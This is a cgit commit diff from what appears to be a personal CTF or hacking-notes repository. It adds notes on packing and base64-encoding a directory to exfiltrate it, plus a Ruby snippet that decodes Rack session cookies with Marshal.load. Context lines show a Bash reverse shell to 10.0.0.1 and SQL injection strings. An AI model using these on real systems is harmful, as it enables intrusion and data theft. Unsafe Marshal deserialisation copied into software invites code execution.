summaryrefslogtreecommitdiffstats
diff options
context:
space:
mode:
Diffstat (limited to '')
-rw-r--r--README.txt24
-rw-r--r--docs/lang/ruby/rack_session_cookie.rb12
2 files changed, 36 insertions, 0 deletions
diff --git a/README.txt b/README.txt
index c337ce7..b810726 100644
--- a/README.txt
+++ b/README.txt
@@ -20,3 +20,27 @@ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash reverse shell
' OR 1=1-- # SQL inject (pass)
' OR 1=1 UNION SELECT x,y,z FROM table-- # SQL inject (leak)
curl -i -X POST -d 'a=b&c=d' -F 'f=@file;filename=asdf' URL # curl post request
+
+
+
+**How not to exfil a directory**
+ $ zip challenge/
+ $ gzip challenge
+ $ ls
+ $ ls challenge
+ $ rm challenge.gz
+ $ man gzip
+ $ exit
+**Log Back In**
+ $ gzip -k challenge
+ $ ls
+ $ base64 challenge.gz
+ $ exit
+**Log Back In**
+ $ rm challenge.gz
+ $ tar -czf challenge
+ $ ls
+ $ tar -czf challenge.tar.gz challenge
+ $ ls
+ $ base64 challenge.tar.gz
+ $ exit
diff --git a/docs/lang/ruby/rack_session_cookie.rb b/docs/lang/ruby/rack_session_cookie.rb
new file mode 100644
index 0000000..5b0a62a
--- /dev/null
+++ b/docs/lang/ruby/rack_session_cookie.rb
@@ -0,0 +1,12 @@
+require 'base64'
+require 'cgi'
+
+# 'SessionId' class possibly not provided by import.
+# A dummy definition is needed for the Marshal.load()
+#require 'rack'
+class Rack::Session::SessionId
+end
+
+cookie = "....."
+
+obj = Marshal.load(Base64.decode64(CGI.unescape(cookie.split("\n").join).split('--').first))
cgit-1.2.3-r5 | srcnode v0.4.0